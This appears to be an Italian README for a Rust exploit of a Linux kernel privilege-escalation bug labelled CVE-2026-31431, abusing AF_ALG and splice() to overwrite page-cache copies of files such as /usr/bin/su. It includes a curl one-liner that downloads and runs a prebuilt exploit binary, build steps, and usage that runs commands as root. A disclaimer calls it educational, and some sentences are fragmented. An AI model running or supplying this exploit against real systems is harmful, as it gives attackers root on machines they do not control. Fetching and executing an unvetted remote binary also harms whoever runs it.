
Copy Fail exploit (CVE-2026-31431) ma in Rust.
Exploit Copy Fail (CVE-2026-31431) ma in Rust, una vulnerabilità critica che combina AF_ALG e splice() per ottenere una scrittura di 4 byte nella page cache, portando a un'escalation dei privilegi locali sulle principali distribuzioni Linux.
Basato sulla ricerca e sul PoC di Xint Code.
[!CAUTION] Questo progetto è solo a scopo educativo e di ricerca. Eseguire questo exploit su sistemi di cui non si è proprietari o per cui non si ha esplicita autorizzazione a testare è illegale e non etico. Usa questo codice in modo responsabile per comprendere e difenderti da vulnerabilità simili.
AF_ALG e splice() del kernel Linux tramite libc.Puoi scaricare ed eseguire direttamente il binario PoC precompilato:
curl -L https://github.com/sammwyy/copyfail-rs/releases/download/poc/copyfail-rs_x86-64 -o copyfail-rs && chmod +x copyfail-rs && ./copyfail-rs
/usr/bin/su).Clona il repository e compila il binario:
git clone https://github.com/sammwyy/copyfail-rs.git
cd copyfail-rs
cargo build --release
Esegui l'exploit senza argomenti per usare il default /bin/sh:
./target/release/copyfail-rs
Oppure specifica un comando personalizzato da eseguire come root:
./target/release/copyfail-rs "whoami > /tmp/pwned"
L'exploit sfrutta un bug nell'implementazione di authencesn all'interno della Crypto API del kernel Linux (AF_ALG). Combinando sendmsg con MSG_MORE e splice(), è possibile sovrascrivere piccoli blocchi della page cache per file arbitrari (come /usr/bin/su) con un payload ELF malevolo.
AF_ALG e lo associa a authencesn(hmac(sha256),cbc(aes)).AF_ALG.